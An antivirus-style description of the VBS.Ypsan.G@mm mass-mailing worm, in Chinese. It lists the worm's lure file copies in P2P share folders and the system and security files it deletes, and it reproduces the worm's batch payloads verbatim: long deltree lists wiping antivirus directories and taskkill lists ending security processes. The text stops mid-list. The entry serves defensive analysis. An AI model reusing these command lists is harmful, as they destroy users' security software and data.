病毒名称: VBS.Ypsan.G@mm 类别: 邮件病毒 病毒资料: 该病毒长度为127,413字节,感染windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows xp系统。它是一个邮件病毒,通过搜寻Windows地址簿发送邮件传播,同时通过局域网文件共享感染,这个病毒删除文件、目录、注册表项,试图关闭计算机;当收到、打开此邮件病毒时,有以下危害:
A复制自身到
• C:\WINDOWS\Sytem32\WINLOGON.vbs
• C:\windows\system\porno.vbs
• C:\Virc\Sexy Girls.mpg.vbs
• C:\windows\system\system.vbs
• C:\windows\system\system32.dll
• C:\windows\system\sys32.dll
• C:\PRogram Files\KMD\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\Program Files\KMD\My Shared Folder\Sexy girls.jpg.vbs
• C:\Program Files\KMD\My Shared Folder\girls.mpg.vbs
• C:\Program Files\KMD\My Shared Folder\pussy.Gif.vbs
• C:\Program Files\KMD\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\KaZaA Lite\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\Program Files\KaZaA Lite\My Shared Folder\Sexy girls.jpg.vbs
• C:\Program Files\KaZaA Lite\My Shared Folder\girls.mpg.vbs
• C:\Program Files\KaZaA Lite\My Shared Folder\pussy.Gif.vbs
• C:\Program Files\KaZaA Lite\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\Morpheus\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\Program Files\Morpheus\My Shared Folder\Sexy girls.jpg.vbs
• C:\Program Files\Morpheus\My Shared Folder\girls.mpg.vbs
• C:\Program Files\Morpheus\My Shared Folder\pussy.Gif.vbs
• C:\Program Files\Morpheus\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\BearShare\Shared\Porno-Pic.Jpg.vbs
• C:\Program Files\BearShare\Shared\Sexy girls.jpg.vbs
• C:\Program Files\BearShare\Shared\girls.mpg.vbs
• C:\Program Files\BearShare\Shared\pussy.Gif.vbs
• C:\Program Files\BearShare\Shared\Ass.Mpg.vbs
• C:\Program Files\Edonkey2000\Incoming\Porno-Pic.Jpg.vbs
• C:\Program Files\Edonkey2000\Incoming\Sexy girls.jpg.vbs
• C:\Program Files\Edonkey2000\Incoming\girls.mpg.vbs
• C:\Program Files\Edonkey2000\Incoming\pussy.Gif.vbs
• C:\Program Files\Edonkey2000\Incoming\Ass.Mpg.vbs
• C:\My Downloads\Porno-Pic.Jpg.vbs
• C:\My Downloads\Sexy girls.jpg.vbs
• C:\My Downloads\girls.mpg.vbs
• C:\My Downloads\pussy.Gif.vbs
• C:\My Downloads\Ass.Mpg.vbs
• C:\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\My Shared Folder\Sexy girls.jpg.vb
• C:\My Shared Folder\girls.mpg.vbs
• C:\My Shared Folder\pussy.Gif.vbs
• C:\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\appleJuice\incoming\Porno-Pic.Jpg.vbs
• C:\Program Files\appleJuice\incoming\Sexy girls.jpg.vb
• C:\Program Files\appleJuice\incoming\girls.mpg.vbs
• C:\Program Files\appleJuice\incoming\pussy.Gif.vbs
• C:\Program Files\appleJuice\incoming\Ass.Mpg.vbs
• C:\Program Files\GnUCleus\Downloads\Porno-Pic.Jpg.vbs
• C:\Program Files\Gnucleus\Downloads\Sexy girls.jpg.vb
• C:\Program Files\Gnucleus\Downloads\girls.mpg.vbs
• C:\Program Files\Gnucleus\Downloads\pussy.Gif.vbs
• C:\Program Files\Gnucleus\Downloads\Ass.Mpg.vbs
• C:\Program Files\Grokster\My Grokster\Porno-Pic.Jpg.vbs
• C:\Program Files\Grokster\My Grokster\Sexy girls.jpg.vb
• C:\Program Files\Grokster\My Grokster\girls.mpg.vbs
• C:\Program Files\Grokster\My Grokster\pussy.Gif.vbs
• C:\Program Files\Grokster\My Grokster\Ass.Mpg.vbs
• C:\Program Files\ICQ\shared files\Porno-Pic.Jpg.vbs
• C:\Program Files\ICQ\shared files\Sexy girls.jpg.vb
• C:\Program Files\ICQ\shared files\girls.mpg.vbs
• C:\Program Files\ICQ\shared files\pussy.Gif.vbs
• C:\Program Files\ICQ\shared files\Ass.Mpg.vbs
• C:\Program Files\KaZaA\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\Program Files\KaZaA\My Shared Folder\Sexy girls.jpg.vb
• C:\Program Files\KaZaA\My Shared Folder\girls.mpg.vbs
• C:\Program Files\KaZaA\My Shared Folder\pussy.Gif.vbs
• C:\Program Files\KaZaA\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\LimeWire\Shared\Porno-Pic.Jpg.vbs
• C:\Program Files\LimeWire\Shared\Sexy girls.jpg.vb
• C:\Program Files\LimeWire\Shared\girls.mpg.vbs
• C:\Program Files\LimeWire\Shared\pussy.Gif.vbs
• C:\Program Files\LimeWire\Shared\Ass.Mpg.vbs
• C:\Program Files\Overnet\incoming\Porno-Pic.Jpg.vbs
• C:\Program Files\Overnet\incoming\Sexy girls.jpg.vb
• C:\Program Files\Overnet\incoming\girls.mpg.vbs
• C:\Program Files\Overnet\incoming\pussy.Gif.vbs
• C:\Program Files\Overnet\incoming\Ass.Mpg.vbs
• C:\Program Files\Shareaza\Downloads\Porno-Pic.Jpg.vbs
• C:\Program Files\Shareaza\Downloads\Sexy girls.jpg.vb
• C:\Program Files\Shareaza\Downloads\girls.mpg.vbs
• C:\Program Files\Shareaza\Downloads\pussy.Gif.vbs
• C:\Program Files\Shareaza\Downloads\Ass.Mpg.vbs
• C:\Program Files\Swaptor\Download\Porno-Pic.Jpg.vbs
• C:\Program Files\Swaptor\Download\Sexy girls.jpg.vb
• C:\Program Files\Swaptor\Download\girls.mpg.vbs
• C:\Program Files\Swaptor\Download\pussy.Gif.vbs
• C:\Program Files\Swaptor\Download\Ass.Mpg.vbs
• C:\Program Files\WinMX\My Shared Folder\Porno-Pic.Jpg.vbs
• C:\Program Files\WinMX\My Shared Folder\Sexy girls.jpg.vb
• C:\Program Files\WinMX\My Shared Folder\girls.mpg.vbs
• C:\Program Files\WinMX\My Shared Folder\pussy.Gif.vbs
• C:\Program Files\WinMX\My Shared Folder\Ass.Mpg.vbs
• C:\Program Files\Tesla\Files\Porno-Pic.Jpg.vbs
• C:\Program Files\Tesla\Files\Sexy girls.jpg.vb
• C:\Program Files\Tesla\Files\girls.mpg.vbs
• C:\Program Files\Tesla\Files\pussy.Gif.vbs
• C:\Program Files\Tesla\Files\Ass.Mpg.vbs
• C:\Program Files\XoloX\Downloads\Porno-Pic.Jpg.vbs
• C:\Program Files\XoloX\Downloads\Sexy girls.jpg.vb
• C:\Program Files\XoloX\Downloads\girls.mpg.vbs
• C:\Program Files\XoloX\Downloads\pussy.Gif.vbs
• C:\Program Files\XoloX\Downloads\Ass.Mpg.vbs
• C:\Program Files\Rapigator\Share\Porno-Pic.Jpg.vbs
• C:\Program Files\Rapigator\Share\Sexy girls.jpg.vb
• C:\Program Files\Rapigator\Share\girls.mpg.vbs
• C:\Program Files\Rapigator\Share\pussy.Gif.vbs
• C:\Program Files\Rapigator\Share\Ass.Mpg.vbs
B 删除以下文件,降低计算机安全功能
• C:\Windows\System32\taskmgr.exe
• C:\Windows\System32\wuauclt1.exe
• C:\Windows\System32\wuauclt.exe
• C:\Windows\System32\wupdmgr.exe
• C:\Windows\Regedit.exe
• C:\Program Files\Lavasoft\Ad-Aware SE Professional\defs.ref
• C:\Program Files\Lavasoft\Ad-Aware SE Professional\sites.txt
• C:\WINDOWS\system32\dumprep.exe
• C:\WINDOWS\inf\machine.inf
C 删除以下目录,破坏系统恢复和备份
• C:\WINDOWS\repair
• C:\WINDOWS\system32\ReinstallBackups
D 覆盖C:\autoexec.bat文件,试图删除各种杀毒软件和安全工具
@deltree/y c:\antiba~1\*.* >nul
@deltree/y c:\antiba~2\*.* >nul
@deltree/y c:\antiba~1.1\*.* >nul
@deltree/y c:\antiba~1.2\*.* >nul
@deltree/y c:\antiba~1.3\*.* >nul
@deltree/y c:\antiba~1.4\*.* >nul
@deltree/y c:\antiba~1.5\*.* >nul
@deltree/y c:\antiba~1.6\*.* >nul
@deltree/y c:\antiba~1.7\*.* >nul
@deltree/y c:\antiba~1.8\*.* >nul
@deltree/y c:\antivi~1\*.* >nul
@deltree/y c:\antivi~2\*.* >nul
@deltree/y c:\antiviru\*.* >nul
@deltree/y c:\avg\*.* >nul
@deltree/y c:\avp\*.* >nul
@deltree/y c:\avp30\*.* >nul
@deltree/y c:\avx\*.* >nul
@deltree/y c:\avpers~1\*.* >nul
@deltree/y c:\bitdef~1\*.* >nul
@deltree/y c:\bitdef~2\*.* >nul
@deltree/y c:\comman~1\*.* >nul
@deltree/y c:\cleancih\*.* >nul
@deltree/y c:\esafen\*.* >nul
@deltree/y c:\findvi~1\*.* >nul
@deltree/y c:\f-macro\*.* >nul
@deltree/y c:\f-prot\*.* >nul
@deltree/y c:\f-prot95\*.* >nul
@deltree/y c:\f-secu~1\*.* >nul
@deltree/y c:\fwin\*.* >nul
@deltree/y c:\fwin32\*.* >nul
@deltree/y c:\inocul~1\*.* >nul
@deltree/y c:\inocul~2\*.* >nul
@deltree/y c:\kasper~1\*.* >nul
@deltree/y c:\kasper~2\*.* >nul
@deltree/y c:\mcafee\*.* >nul
@deltree/y c:\mcafee~1\*.* >nul
@deltree/y c:\msav\*.* >nul
@deltree/y c:\norman\*.* >nul
@deltree/y c:\norton~1\*.* >nul
@deltree/y c:\norton~2\*.* >nul
@deltree/y c:\pav\*.* >nul
@deltree/y c:\pccill~1\*.* >nul
@deltree/y c:\pc-cil~1\*.* >nul
@deltree/y c:\rav\*.* >nul
@deltree/y c:\softwin\*.* >nul
@deltree/y c:\tbav\*.* >nul
@deltree/y c:\tbavw95\*.* >nul
@deltree/y c:\toolkit\*.* >nul
@deltree/y c:\trendm~1\*.* >nul
@deltree/y c:\trex\*.* >nul
@deltree/y c:\virus\*.* >nul
@deltree/y c:\vpc\*.* >nul
@deltree/y c:\vs95\*.* >nul
@deltree/y c:\zonela~1\*.* >nul
@deltree/y c:\zonela~2\*.* >nul
@deltree/y c:\progra~1\antiba~1\*.* >nul
@deltree/y c:\progra~1\antiba~2\*.* >nul
@deltree/y c:\progra~1\antiba~1.1\*.* >nul
@deltree/y c:\progra~1\antiba~1.2\*.* >nul
@deltree/y c:\progra~1\antiba~1.3\*.* >nul
@deltree/y c:\progra~1\antiba~1.4\*.* >nul
@deltree/y c:\progra~1\antiba~1.5\*.* >nul
@deltree/y c:\progra~1\antiba~1.6\*.* >nul
@deltree/y c:\progra~1\antiba~1.7\*.* >nul
@deltree/y c:\progra~1\antiba~1.8\*.* >nul
@deltree/y c:\progra~1\antivi~1\*.* >nul
@deltree/y c:\progra~1\antivi~2\*.* >nul
@deltree/y c:\progra~1\avg\*.* >nul
@deltree/y c:\progra~1\avp\*.* >nul
@deltree/y c:\progra~1\avx\*.* >nul
@deltree/y c:\progra~1\avx2000\*.* >nul
@deltree/y c:\progra~1\avpers~1\*.* >nul
@deltree/y c:\progra~1\bitdef~1\*.* >nul
@deltree/y c:\progra~1\bitdef~2\*.* >nul
@deltree/y c:\progra~1\comman~1\*.* >nul
@deltree/y c:\progra~1\common~1\avpsha~1*.* >nul
@deltree/y c:\progra~1\common~1\symant~1\*.* >nul
@deltree/y c:\progra~1\datafe~1\*.* >nul
@deltree/y c:\progra~1\deerfi~1.com\*.* >nul
@deltree/y c:\progra~1\f-prot\*.* >nul
@deltree/y c:\progra~1\f-prot95\*.* >nul
@deltree/y c:\progra~1\findvi~1\*.* >nul
@deltree/y c:\progra~1\f-secu~1\*.* >nul
@deltree/y c:\progra~1\f-secure\*.* >nul
@deltree/y c:\progra~1\fsi\*.* >nul
@deltree/y c:\progra~1\fwin\*.* >nul
@deltree/y c:\progra~1\fwin32\*.* >nul
@deltree/y c:\progra~1\grisoft\*.* >nul
@deltree/y c:\progra~1\inocul~1\*.* >nul
@deltree/y c:\progra~1\inocul~2\*.* >nul
@deltree/y c:\progra~1\intern~2\*.* >nul
@deltree/y c:\progra~1\kasper~1\*.* >nul
@deltree/y c:\progra~1\kasper~2\*.* >nul
@deltree/y c:\progra~1\mcafee\*.* >nul
@deltree/y c:\progra~1\mcafee~1\*.* >nul
@deltree/y c:\progra~1\mindso~1\*.* >nul
@deltree/y c:\progra~1\norman\*.* >nul
@deltree/y c:\progra~1\norton~1\*.* >nul
@deltree/y c:\progra~1\norton~2\*.* >nul
@deltree/y c:\progra~1\pandas~1\*.* >nul
@deltree/y c:\progra~1\protec~1\*.* >nul
@deltree/y c:\progra~1\protec~2\*.* >nul
@deltree/y c:\progra~1\quickh~1\*.* >nul
@deltree/y c:\progra~1\rav\*.* >nul
@deltree/y c:\progra~1\signal9\*.* >nul
@deltree/y c:\progra~1\softwin\*.* >nul
@deltree/y c:\progra~1\spysto~1\*.* >nul
@deltree/y c:\progra~1\symant~1\*.* >nul
@deltree/y c:\progra~1\tbav\*.* >nul
@deltree/y c:\progra~1\tinype~1\*.* >nul
@deltree/y c:\progra~1\trendm~1\*.* >nul
@deltree/y c:\progra~1\trendp~1\*.* >nul
@deltree/y c:\progra~1\trojan~1\*.* >nul
@deltree/y c:\progra~1\trojan~2\*.* >nul
@deltree/y c:\progra~1\virusm~1.0\*.* >nul
@deltree/y c:\progra~1\zonela~1\*.* >nul
@deltree/y c:\progra~1\zonela~2\*.* >nul
E 覆盖C:\WINDOWS\System32\Taskmgr.bat文件,来结束各种杀毒软件和安全工具
@taskkill /IM ACKWIN32.exe /F
@taskkill /IM ADAWARE.exe /F
@taskkill /IM ADVXDWIN.exe /F
@taskkill /IM AGENTSVR.exe /F
@taskkill /IM AGENTW.exe /F
@taskkill /IM ALERTSVC.exe /F
@taskkill /IM ALEVIR.exe /F
@taskkill /IM ALOGSERV.exe /F
@taskkill /IM AMON9X.exe /F
@taskkill /IM ANTI-TROJAN.exe /F
@taskkill /IM ANTIVIRUS.exe /F
@taskkill /IM ANTS.exe /F
@taskkill /IM APIMONITOR.exe /F
@taskkill /IM APLICA32.exe /F
@taskkill /IM APVXDWIN.exe /F
@taskkill /IM ARR.exe /F
@taskkill /IM ATCON.exe /F
@taskkill /IM ATGUARD.exe /F
@taskkill /IM ATRO55EN.exe /F
@taskkill /IM ATUPDATER.exe /F
@taskkill /IM ATUPDATER.exe /F
@taskkill /IM ATWATCH.exe /F
@taskkill /IM AU.exe /F
@taskkill /IM AUPDATE.exe /F
@taskkill /IM AUPDATE.exe /F
@taskkill /IM AUTODOWN.exe /F
@taskkill /IM AUTODOWN.exe /F
@taskkill /IM AUTOTRACE.exe /F
@taskkill /IM AUTOTRACE.exe /F
@taskkill /IM AUTOUPDATE.exe /F
@taskkill /IM AUTOUPDATE.exe /F
@taskkill /IM AVCONSOL.exe /F
@taskkill /IM AVE32.exe /F
@taskkill /IM AVGCC32.exe /F
@taskkill /IM AVGCTRL.exe /F
@taskkill /IM AVGNT.exe /F
@taskkill /IM AVGSERV.exe /F
@taskkill /IM AVGSERV9.exe /F
@taskkill /IM AVGUARD.exe /F
@taskkill /IM AVGW.exe /F
@taskkill /IM AVKPOP.exe /F
@taskkill /IM AVKSERV.exe /F
@taskkill /IM AVKSERVICE.exe /F
@taskkill /IM AVKWCTl9.exe /F
@taskkill /IM AVLTMAIN.exe /F
@taskkill /IM AVNT.exe /F
@taskkill /IM AVP.exe /F
@taskkill /IM AVP32.exe /F
@taskkill /IM AVPCC.exe /F
@taskkill /IM AVPDOS32.exe /F
@taskkill /IM AVPM.exe /F
@taskkill /IM AVPTC32.exe /F
@taskkill /IM AVPUPD.exe /F
@taskkill /IM AVPUPD.exe /F
@taskkill /IM AVSCHED32.exe /F
@taskkill /IM AVSYNMGR.exe /F
@taskkill /IM AVWINNT.exe /F
@taskkill /IM AVWUPD.exe /F
@taskkill /IM AVWUPD32.exe /F
@taskkill /IM AVWUPD32.exe /F
@taskkill /IM AVWUPSRV.exe /F
@taskkill /IM AVXMONITOR9X.exe /F
@taskkill /IM AVXMONITORNT.exe /F
@taskkill /IM AVXQUAR.exe /F
@taskkill /IM AVXQUAR.exe /F
@taskkill /IM BACKWEB.exe /F
@taskkill /IM BARGAINS.exe /F
@taskkill /IM BD_PROFESSIONAL.exe /F
@taskkill /IM BEAGLE.exe /F
@taskkill /IM BELT.exe /F
@taskkill /IM BIDEF.exe /F
@taskkill /IM BIDSERVER.exe /F
@taskkill /IM BipCP.exe /F
@taskkill /IM BIPCPEVALSETUP.exe /F
@taskkill /IM BISP.exe /F
@taskkill /IM BLACKD.exe /F
@taskkill /IM BLACKICE.exe /F
@taskkill /IM BLSS.exe /F
@taskkill /IM BOOTCONF.exe /F
@taskkill /IM BOOTWARN.exe /F
@taskkill /IM BORG2.exe /F
@taskkill /IM BPC.exe /F
@taskkill /IM BRASIL.exe /F
@taskkill /IM BS120.exe /F
@taskkill /IM BUNDLE.exe /F
@taskkill /IM BVT.exe /F
@taskkill /IM CCAPP.exe /F
@taskkill /IM CCEVTMGR.exe /F
@taskkill /IM CCPXYSVC.exe /F
@taskkill /IM CDP.exe /F
@taskkill /IM CFD.exe /F
@taskkill /IM CFGWIZ.exe /F
@taskkill /IM CFIADMIN.exe /F
@taskkill /IM CFIAUDIT.exe /F
@taskkill /IM CFIAUDIT.exe /F
@taskkill /IM CFINET.exe /F
@taskkill /IM CFINET32.exe /F
@taskkill /IM CLEAN.exe /F
@taskkill /IM CLEANER.exe /F
@taskkill /IM CLEANER3.exe /F
@taskkill /IM CLEANPC.exe /F
@taskkill /IM CLICK.exe /F
@taskkill /IM CMD32.exe /F
@taskkill /IM CMESYS.exe /F
@taskkill /IM CMGRDIAN.exe /F
@taskkill /IM CMON016.exe /F
@taskkill /IM CONNECTIONMONITOR.exe /F
@taskkill /IM CPD.exe /F
@taskkill /IM CPF9X206.exe /F
@taskkill /IM CPFNT206.exe /F
@taskkill /IM CTRL.exe /F
@taskkill /IM CV.exe /F
@taskkill /IM CWNB181.exe /F
@taskkill /IM CWNTDWMO.exe /F
@taskkill /IM CLAW95CF.exe /F
@taskkill /IM DATEMANAGER.exe /F
@taskkill /IM DCOMX.exe /F
@taskkill /IM DEFALERT.exe /F
@taskkill /IM DEFSCANGUI.exe /F
@taskkill /IM DEFWATCH.exe /F
@taskkill /IM DEPUTY.exe /F
@taskkill /IM DIVX.exe /F
@taskkill /IM DLLCACHE.exe /F
@taskkill /IM DLLREG.exe /F
@taskkill /IM DOORS.exe /F
@taskkill /IM DPF.exe /F
@taskkill /IM DPFSETUP.exe /F
@taskkill /IM DPPS2.exe /F
@taskkill /IM DRWATSON.exe /F
@taskkill /IM DRWEB32.exe /F
@taskkill /IM DRWEBUPW.exe /F
@taskkill /IM DSSAGENT.exe /F
@taskkill /IM DVP95.exe /F
@taskkill /IM DVP95_0.exe /F
@taskkill /IM ECENGINE.exe /F
@taskkill /IM EFPEADM.exe /F
@taskkill /IM EMSW.exe /F
@taskkill /IM ENT.exe /F
@taskkill /IM ESAFE.exe /F
@taskkill /IM ESCANHNT.exe /F
@taskkill /IM ESCANV95.exe /F
@taskkill /IM ESPWATCH.exe /F
@taskkill /IM ETHEREAL.exe /F
@taskkill /IM ETRUSTCIPE.exe /F
@taskkill /IM EVPN.exe /F
@taskkill /IM EXANTIVIRUS-CNET.exe /F
@taskkill /IM EXE.AVXW.exe /F
@taskkill /IM EXPERT.exe /F
@taskkill /IM EXPLORE.exe /F
@taskkill /IM F-PROT.exe /F
@taskkill /IM F-PROT95.exe /F
@taskkill /IM F-STOPW.exe /F
@taskkill /IM FAMEH32.exe /F
@taskkill /IM FAST.exe /F
@taskkill /IM FCH32.exe /F
@taskkill /IM FIH32.exe /F
@taskkill /IM FINDVIRU.exe /F
@taskkill /IM FIREWALL.exe /F
@taskkill /IM FNRB32.exe /F
@taskkill /IM FP-WIN.exe /F
@taskkill /IM FP-WIN_TRIAL.exe /F
@taskkill /IM FPROT.exe /F
@taskkill /IM FRW.exe /F
@taskkill /IM FSAA.exe /F
@taskkill /IM FSAV.exe /F
@taskkill /IM FSAV32.exe /F
@taskkill /IM FSAV530STBYB.exe /F
@taskkill /IM FSAV530WTBYB.exe /F
@taskkill /IM FSAV95.exe /F
@taskkill /IM FSGK32.exe /F
@taskkill /IM FSM32.exe /F
@taskkill /IM FSMA32.exe /F
@taskkill /IM FSMB32.exe /F
@taskkill /IM GATOR.exe /F
@taskkill /IM GBMENU.exe /F
@taskkill /IM GBPOLL.exe /F
@taskkill /IM GENERICS.exe /F
@taskkill /IM GMT.exe /F
@taskkill /IM GUARD.exe /F
@taskkill /IM GUARDDOG.exe /F
@taskkill /IM HACKTRACERSETUP.exe /F
@taskkill /IM HBINST.exe /F
@taskkill /IM HBSRV.exe /F
@taskkill /IM HOTACTIO.exe /F
@taskkill /IM HOTPATCH.exe /F
@taskkill /IM HTLOG.exe /F
@taskkill /IM HTPATCH.exe /F
@taskkill /IM HWPE.exe /F
@taskkill /IM HXDL.exe /F
@taskkill /IM HXIUL.exe /F
@taskkill /IM IAMAPP.exe /F
@taskkill /IM IAMSERV.exe /F
@taskkill /IM IAMSTATS.exe /F
@taskkill /IM IBMASN.exe /F
@taskkill /IM IBMAVSP.exe /F
@taskkill /IM ICLOADNT.exe /F
@taskkill /IM ICMON.exe /F
@taskkill /IM ICSUPP95.exe /F
@taskkill /IM ICSUPPNT.exe /F
@taskkill /IM IDLE.exe /F
@taskkill /IM IEDLL.exe /F
@taskkill /IM IEDRIVER.exe /F
@taskkill /IM IEXPLORER.exe /F
@taskkill /IM IFACE.exe /F
@taskkill /IM IFW2000.exe /F
@taskkill /IM INETLNFO.exe /F
@taskkill /IM INFUS.exe /F
@taskkill /IM INFWIN.exe /F
@taskkill /IM INIT.exe /F
@taskkill /IM INTDEL.exe /F
@taskkill /IM INTREN.exe /F
@taskkill /IM IOMON98.exe /F
@taskkill /IM ISTSVC.exe /F
@taskkill /IM JAMMER.exe /F
@taskkill /IM JDBGMRG.exe /F
@taskkill /IM JEDI.exe /F
@taskkill /IM KAVLITE40ENG.exe /F
@taskkill /IM KAVPERS40ENG.exe /F
@taskkill /IM KAVPF.exe /F
@taskkill /IM KAZZA.exe /F
@taskkill /IM KEENVALUE.exe /F
@taskkill /IM KERIO-PF-213-EN-WIN.exe /F
@taskkill /IM KERIO-WRL-421-EN-WIN.exe /F
@taskkill /IM KERIO-WRP-421-EN-WIN.exe /F
@taskkill /IM KERNEL32.exe /F
@taskkill /IM KILLPROCESSSETUP161.exe /F
@taskkill /IM LAUNCHER.exe /F
@taskkill /IM LDNETMON.exe /F
@taskkill /IM LDPRO.exe /F
@taskkill /IM LDPROMENU.exe /F
@taskkill /IM LDSCAN.exe /F
@taskkill /IM LNETINFO.exe /F
@taskkill /IM LOADER.exe /F
@taskkill /IM LOCALNET.exe /F
@taskkill /IM LOCKDOWN.exe /F
@taskkill /IM LOCKDOWN2000.exe /F
@taskkill /IM LOOKOUT.exe /F
@taskkill /IM LORDPE.exe /F
@taskkill /IM LSETUP.exe /F
@taskkill /IM LUALL.exe /F
@taskkill /IM LUALL.exe /F
@taskkill /IM LUAU.exe /F
@taskkill /IM LUCOMSERVER.exe /F
@taskkill /IM LUINIT.exe /F
@taskkill /IM LUSPT.exe /F
@taskkill /IM MAPISVC32.exe /F
@taskkill /IM MCAGENT.exe /F
@taskkill /IM MCMNHDLR.exe /F
@taskkill /IM MCSHIELD.exe /F
@taskkill /IM MCTOOL.exe /F
@taskkill /IM MCUPDATE.exe /F
@taskkill /IM MCUPDATE.exe /F
@taskkill /IM MCVSRTE.exe /F
@taskkill /IM MCVSSHLD.exe /F
@taskkill /IM MD.exe /F
@taskkill /IM MFIN32.exe /F
@taskkill /IM MFW2EN.exe /F
@taskkill /IM MFWENG3.02D30.exe /F
@taskkill /IM MGAVRTCL.exe /F
@taskkill /IM MGAVRTE.exe /F
@taskkill /IM MGHtml.exe /F
@taskkill /IM MGUI.exe /F
@taskkill /IM MINILOG.exe /F
@taskkill /IM MMOD.exe /F
@taskkill /IM MONITOR.exe /F
@taskkill /IM MOOLIVE.exe /F
@taskkill /IM MOSTAT.exe /F
@taskkill /IM MPFAGENT.exe /F
@taskkill /IM MPFSERVICE.exe /F
@taskkill /IM MPFTRAY.exe /F
@taskkill /IM MRFLUX.exe /F
@taskkill /IM MSAPP.exe /F
@taskkill /IM MSBB.exe /F
@taskkill /IM MSBLAST.exe /F
@taskkill /IM MSCACHE.exe /F
@taskkill /IM MSCCN32.exe /F
@taskkill /IM MSCMAN.exe /F
@taskkill /IM MSCONFIG.exe /F
@taskkill /IM MSDM.exe /F
@taskkill /IM MSDOS.exe /F
@taskkill /IM MSIEXEC16.exe /F
@taskkill /IM MSINFO32.exe /F
@taskkill /IM MSLAUGH.exe /F
@taskkill /IM MSMGT.exe /F
@taskkill /IM MSMSGRI32.exe /F
@taskkill /IM MSSMMC32.exe /F
@taskkill /IM MSSYS.exe /F
@taskkill /IM MSVXD.exe /F
@taskkill /IM MU0311AD.exe /F
@taskkill /IM MWATCH.exe /F
@taskkill /IM N32SCANW.exe /F
@taskkill /IM NAV.exe /F
@taskkill /IM AUTO-PROTECT.NAV80TRY.exe /F
@taskkill /IM NAVAP.NAVAPSVC.exe /F
@taskkill /IM NAVAPSVC.exe /F
@taskkill /IM NAVAPW32.exe /F
@taskkill /IM NAVDX.exe /F
@taskkill /IM NAVLU32.exe /F
@taskkill /IM NAVNT.exe /F
@taskkill /IM NAVSTUB.exe /F
@taskkill /IM NAVW32.exe /F
@taskkill /IM NAVWNT.exe /F
@taskkill /IM NC2000.exe /F
@taskkill /IM NCINST4.exe /F
@taskkill /IM NDD32.exe /F
@taskkill /IM NEOMONITOR.exe /F
@taskkill /IM NEOWATCHLOG.exe /F
@taskkill /IM NETARMOR.exe /F
@taskkill /IM NETD32.exe /F
@taskkill /IM NETINFO.exe /F
@taskkill /IM NETMON.exe /F
@taskkill /IM NETSCANPRO.exe /F
@taskkill /IM NETSPYHUNTER-1.2.exe /F
@taskkill /IM NETSTAT.exe /F
@taskkill /IM NETUTILS.exe /F
@taskkill /IM NISSERV.exe /F
@taskkill /IM NISUM.exe /F
@taskkill /IM NMAIN.exe /F
@taskkill /IM NOD32.exe /F
@taskkill /IM NORMIST.exe /F
@taskkill /IM NORTON_INTERNET_SECU_3.0_407.exe /F
@taskkill /IM NOTSTART.exe /F
@taskkill /IM NPF40_TW_98_NT_ME_2K.exe /F
@taskkill /IM NPFMESSENGER.exe /F
@taskkill /IM NPROTECT.exe /F
@taskkill /IM NPSCHECK.exe /F
@taskkill /IM NPSSVC.exe /F
@taskkill /IM NSCHED32.exe /F
@taskkill /IM NSSYS32.exe /F
@taskkill /IM NSTASK32.exe /F
@taskkill /IM NSUPDATE.exe /F
@taskkill /IM NT.exe /F
@taskkill /IM NTRTSCAN.exe /F
@taskkill /IM NTVDM.exe /F
@taskkill /IM NTXconfig.exe /F
@taskkill /IM NUI.exe /F
@taskkill /IM NUPGRADE.exe /F
@taskkill /IM NUPGRADE.exe /F
@taskkill /IM NVARCH16.exe /F
@taskkill /IM NVC95.exe /F
@taskkill /IM NVSVC32.exe /F
@taskkill /IM NWINST4.exe /F
@taskkill /IM NWSERVICE.exe /F
@taskkill /IM NWTOOL16.exe /F
@taskkill /IM OLLYDBG.exe /F
@taskkill /IM ONSRVR.exe /F
@taskkill /IM OPTIMIZE.exe /F
@taskkill /IM OSTRONET.exe /F
@taskkill /IM OTFIX.exe /F
@taskkill /IM OUTPOST.exe /F
@taskkill /IM OUTPOST.exe /F
@taskkill /IM OUTPOSTINSTALL.exe /F
@taskkill /IM OUTPOSTPROINSTALL.exe /F
@taskkill /IM PADMIN.exe /F
@taskkill /IM PANIXK.exe /F
@taskkill /IM PATCH.exe /F
@taskkill /IM PAVCL.exe /F
@taskkill /IM PAVPROXY.exe /F
@taskkill /IM PAVSCHED.exe /F
@taskkill /IM PAVW.exe /F
@taskkill /IM PCFWALLICON.exe /F
@taskkill /IM PCIP10117_0.exe /F
@taskkill /IM PCSCAN.exe /F
@taskkill /IM PDSETUP.exe /F
@taskkill /IM PERISCOPE.exe /F
@taskkill /IM PERSFW.exe /F
@taskkill /IM PERSWF.exe /F
@taskkill /IM PF2.exe /F
@taskkill /IM PFWADMIN.exe /F
@taskkill /IM PGMONITR.exe /F
@taskkill /IM PINGSCAN.exe /F
@taskkill /IM PLATIN.exe /F
@taskkill /IM POP3TRAP.exe /F
@taskkill /IM POPROXY.exe /F
@taskkill /IM POPSCAN.exe /F
@taskkill /IM PORTDETECTIVE.exe /F
@taskkill /IM PORTMONITOR.exe /F
@taskkill /IM POWERSCAN.exe /F
@taskkill /IM PPINUPDT.exe /F
@taskkill /IM PPTBC.exe /F
@taskkill /IM PPVSTOP.exe /F
@taskkill /IM PRIZESURFER.exe /F
@taskkill /IM PRMT.exe /F
@taskkill /IM PRMVR.exe /F
@taskkill /IM PROCDUMP.exe /F
@taskkill /IM PROCESSMONITOR.exe /F
@taskkill /IM PROCEXPLORERV1.0.exe /F
@taskkill /IM PROGRAMAUDITOR.exe /F
@taskkill /IM PROPORT.exe /F
@taskkill /IM PROTECTX.exe /F
@taskkill /IM PSPF.exe /F
@taskkill /IM PURGE.exe /F
@taskkill /IM QCONSOLE.exe /F
@taskkill /IM QSERVER.exe /F
@taskkill /IM RAPAPP.exe /F
@taskkill /IM RAV7.exe /F
@taskkill /IM RAV7WIN.exe /F
@taskkill /IM RAV8WIN32ENG.exe /F
@taskkill /IM RAY.exe /F
@taskkill /IM RB32.exe /F
@taskkill /IM RCSYNC.exe /F
@taskkill /IM REALMON.exe /F
@taskkill /IM REGED.exe /F
@taskkill /IM REGEDIT.exe /F
